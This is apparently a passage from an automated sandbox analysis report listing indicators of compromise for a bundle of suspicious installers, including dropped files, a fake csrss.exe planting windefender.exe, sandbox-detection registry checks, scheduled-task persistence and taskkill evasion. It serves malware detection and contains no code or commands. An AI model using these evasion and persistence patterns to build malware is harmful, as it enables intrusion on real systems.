File created	C:\Program Files (x86)\MaskVPN\driver\win732\is-MOB01.tmp	vpn.tmp
File created	C:\Program Files (x86)\Floral-Hill\7za.exe	app.exe
File opened for modification	C:\Program Files (x86)\viewerise\unins000.dat	vict.tmp
File created	C:\Program Files (x86)\MaskVPN\is-4U76H.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\JCleaner\8.exe	chashepro3.tmp
File opened for modification	C:\Program Files (x86)\JCleaner\unins000.dat	chashepro3.tmp
File created	C:\Program Files (x86)\JCleaner\is-U99M2.tmp	chashepro3.tmp
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\is-RCLG2.tmp	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\is-NEEGI.tmp	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\ipseccmd.exe	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-64L0P.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-2LSEN.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win764\is-NQADS.tmp	vpn.tmp
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\is-CGM23.tmp	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\ssleay32.dll	vpn.tmp
File opened for modification	C:\Program Files (x86)\JCleaner\unins000.dat	chashepro3.tmp
File opened for modification	C:\Program Files (x86)\JCleaner\unins000.dat	chashepro3.tmp
File opened for modification	C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Studio.Refactoring.dll	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\IBBrowserInstallerEngine\am805.dll	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win764\is-INR91.tmp	vpn.tmp
File created	C:\Program Files (x86)\viewerise\is-O1L53.tmp	vict.tmp
File opened for modification	C:\Program Files (x86)\JCleaner\Brava.exe	chashepro3.tmp
File created	C:\Program Files (x86)\viewerise\unins000.dat	2r2utnbvoam.tmp
File opened for modification	C:\Program Files (x86)\viewerise\unins000.dat	2r2utnbvoam.tmp
File opened for modification	C:\Program Files (x86)\viewerise\unins000.dat	vict.tmp
File opened for modification	C:\Program Files (x86)\JCleaner\Brava.exe	chashepro3.tmp

Drops file in Windows directory 29 IoCs

Processes:

DrvInst.exeSetup.tmpapp.exeSetup.tmpWerFault.exeMicrosoftEdge.exeSetup.tmpMaskVPNUpdate.execsrss.exeSetup.tmpmultitimer.exeMicrosoftEdge.exeMicrosoftEdge.exetapinstall.exesvchost.exe

description	ioc	process
File opened for modification	C:\Windows\inf\oem2.inf	DrvInst.exe
File opened for modification	C:\Windows\Microsoft.VisualStudio.Setup.Configuration.Native.dll	Setup.tmp
File created	C:\Windows\inf\oem2.inf	DrvInst.exe
File opened for modification	C:\Windows\rss	app.exe
File created	C:\Windows\is-GFO5M.tmp	Setup.tmp
File created	C:\Windows\AppCompat\Programs\Amcache.hve.tmp	WerFault.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File created	C:\Windows\is-SR1AF.tmp	Setup.tmp
File created	C:\Windows\INF\oem2.PNF	MaskVPNUpdate.exe
File opened for modification	C:\Windows\Microsoft.VisualStudio.Setup.Configuration.Native.dll	Setup.tmp
File opened for modification	C:\Windows\windefender.exe	csrss.exe
File opened for modification	C:\Windows\Microsoft.VisualStudio.Setup.Configuration.Native.dll	Setup.tmp
File created	C:\Windows\is-FKQFL.tmp	Setup.tmp
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new	multitimer.exe
File opened for modification	C:\Windows\Microsoft.VisualStudio.Setup.Configuration.Native.dll	Setup.tmp
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File created	C:\Windows\is-OPDSV.tmp	Setup.tmp
File created	C:\Windows\rss\csrss.exe	app.exe
File created	C:\Windows\is-QAMSD.tmp	Setup.tmp
File opened for modification	C:\Windows\INF\setupapi.dev.log	MaskVPNUpdate.exe
File created	C:\Windows\is-CTG8L.tmp	Setup.tmp
File created	C:\Windows\is-SS09G.tmp	Setup.tmp
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new	multitimer.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	DrvInst.exe
File created	C:\Windows\is-ARRDM.tmp	Setup.tmp
File created	C:\Windows\windefender.exe	csrss.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	tapinstall.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	svchost.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 39 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
6016	2768	WerFault.exe	sfnenv0wjj2.exe
5988	2768	WerFault.exe	sfnenv0wjj2.exe
4816	2768	WerFault.exe	sfnenv0wjj2.exe
6284	2768	WerFault.exe	sfnenv0wjj2.exe
6496	2768	WerFault.exe	sfnenv0wjj2.exe
6864	2768	WerFault.exe	sfnenv0wjj2.exe
6988	2768	WerFault.exe	sfnenv0wjj2.exe
7108	2768	WerFault.exe	sfnenv0wjj2.exe
1264	2768	WerFault.exe	sfnenv0wjj2.exe
384	7452	WerFault.exe	dpi3x1hoyne.exe
1136	7452	WerFault.exe	dpi3x1hoyne.exe
1648	7452	WerFault.exe	dpi3x1hoyne.exe
3164	7452	WerFault.exe	dpi3x1hoyne.exe
996	7452	WerFault.exe	dpi3x1hoyne.exe
7436	7452	WerFault.exe	dpi3x1hoyne.exe
5380	7452	WerFault.exe	dpi3x1hoyne.exe
4288	7452	WerFault.exe	dpi3x1hoyne.exe
4432	7452	WerFault.exe	dpi3x1hoyne.exe
7376	7452	WerFault.exe	dpi3x1hoyne.exe
5040	6604	WerFault.exe	Fai.com
8440	3204	WerFault.exe	yucokcvmiol.exe
8588	3204	WerFault.exe	yucokcvmiol.exe
8672	3204	WerFault.exe	yucokcvmiol.exe
8812	3204	WerFault.exe	yucokcvmiol.exe
9092	3204	WerFault.exe	yucokcvmiol.exe
6672	3204	WerFault.exe	yucokcvmiol.exe
8700	3204	WerFault.exe	yucokcvmiol.exe
3876	3204	WerFault.exe	yucokcvmiol.exe
8520	3204	WerFault.exe	yucokcvmiol.exe
4448	5020	WerFault.exe	iez0muuk1qr.exe
8300	5020	WerFault.exe	iez0muuk1qr.exe
7300	5020	WerFault.exe	iez0muuk1qr.exe
1968	5020	WerFault.exe	iez0muuk1qr.exe
8644	5020	WerFault.exe	iez0muuk1qr.exe
9556	5020	WerFault.exe	iez0muuk1qr.exe
9804	5020	WerFault.exe	iez0muuk1qr.exe
9912	5020	WerFault.exe	iez0muuk1qr.exe
10008	5020	WerFault.exe	iez0muuk1qr.exe
10056	5020	WerFault.exe	iez0muuk1qr.exe

Checks SCSI registry key(s) 3 TTPs 64 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

System Information Discovery

Processes:

svchost.exeMaskVPNUpdate.exesvchost.exeDrvInst.exetapinstall.exeAD754B4D3FE2C4EE.exetapinstall.exeAD754B4D3FE2C4EE.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\UpperFilters	MaskVPNUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000	MaskVPNUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Service	MaskVPNUpdate.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\CompatibleIDs	tapinstall.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\LowerFilters	MaskVPNUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc	AD754B4D3FE2C4EE.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID	tapinstall.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	tapinstall.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags	tapinstall.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Capabilities	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Service	MaskVPNUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Mfg	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName	AD754B4D3FE2C4EE.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Capabilities	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	AD754B4D3FE2C4EE.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID	tapinstall.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Phantom	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID	tapinstall.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags	svchost.exe

Checks processor information in registry 2 TTPs 10 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

Setup.exeSetup.exeSetup.exeD3EF.tmp.exeSetup.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Setup.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Setup.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Setup.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	D3EF.tmp.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	D3EF.tmp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Setup.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

5032 schtasks.exe
4472 schtasks.exe
Delays execution with timeout.exe 6 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid process

10584 timeout.exe
8948 timeout.exe
5488 timeout.exe
6080 timeout.exe
8900 timeout.exe
2100 timeout.exe

pid	process
5032	schtasks.exe
4472	schtasks.exe

pid	process
10584	timeout.exe
8948	timeout.exe
5488	timeout.exe
6080	timeout.exe
8900	timeout.exe
2100	timeout.exe

Enumerates system info in registry 2 TTPs 5 IoCs

Query Registry

System Information Discovery

Processes:

xcopy.exexcopy.exexcopy.exemultitimer.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	multitimer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	multitimer.exe

GoLang User-Agent 12 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

Processes:

description	flow	ioc
HTTP User-Agent header	2569	Go-http-client/1.1
HTTP User-Agent header	2805	Go-http-client/1.1
HTTP User-Agent header	2047	Go-http-client/1.1
HTTP User-Agent header	2156	Go-http-client/1.1
HTTP User-Agent header	2448	Go-http-client/1.1
HTTP User-Agent header	2149	Go-http-client/1.1
HTTP User-Agent header	2153	Go-http-client/1.1
HTTP User-Agent header	2155	Go-http-client/1.1
HTTP User-Agent header	2376	Go-http-client/1.1
HTTP User-Agent header	2035	Go-http-client/1.1
HTTP User-Agent header	2044	Go-http-client/1.1
HTTP User-Agent header	2046	Go-http-client/1.1

Kills process with taskkill 15 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exeTASKKILL.exetaskkill.exetaskkill.exe

pid	process
4420	taskkill.exe
1428	taskkill.exe
9416	taskkill.exe
10652	taskkill.exe
7224	taskkill.exe
4436	taskkill.exe
7808	taskkill.exe
9652	taskkill.exe
8120	taskkill.exe
8116	taskkill.exe
4460	taskkill.exe
5448	taskkill.exe
6544	TASKKILL.exe
7972	taskkill.exe
860	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

Processes:

MicrosoftEdge.exebrowser_broker.exeMicrosoftEdgeCP.exebrowser_broker.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

csrss.exeDrvInst.exemask_svc.exenetsh.exeapp.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1802 = "Line Islands Standard Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	DrvInst.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-171 = "Central Daylight Time (Mexico)"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-42 = "E. South America Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1972 = "Belarus Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1871 = "Russia TZ 7 Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1891 = "Russia TZ 3 Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2592 = "Tocantins Standard Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time"	csrss.exe
